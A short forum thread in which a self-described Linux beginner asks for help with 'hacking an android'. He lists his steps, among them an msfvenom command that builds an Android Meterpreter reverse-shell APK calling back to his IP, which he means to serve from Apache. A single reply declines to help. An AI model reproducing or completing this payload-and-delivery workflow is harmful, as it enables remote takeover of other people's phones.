Can someone please help me?

Discussion in 'Linux Beginners' started by CameronHayne, May 6, 2023.

1. CameronHayne

CameronHayne New Member

Hi everyone,

Im extremely new to Linux and dont quite know how to use it but iv been watching a few online videos and im really trying to learn how to hack an android. Now the commands iv followed so far are as follows:
    Sudo ifconfig and I get the ip address for the Virtual box
    I then use msfvenom -p android/meterpreter/reverse_tcp LHOST=my ip LPORT=5555 -o shell.apk
    I then start the apache2 service and then return to my second screen where the file has been created, however when i try moving it to the virtual server of my ip using command sudo mv name of file.apk /var/www/html/
    The file then dissapears and when I go onto my virtual box and type the ip address in all I get is page cannot be displayed.
    Im not sure if im missing an add on package in kali or what but any advise would be of much appreciation
    thank you

2. ahrasis

ahrasis Well-Known Member HowtoForge Supporter

It seems like you are mixing linux with android which is not ordinary. I am not sure whether any of us have the experience or ability to help you with the same. I think you will have a better luck in other related forum but not this forum.

Last edited: May 14, 2023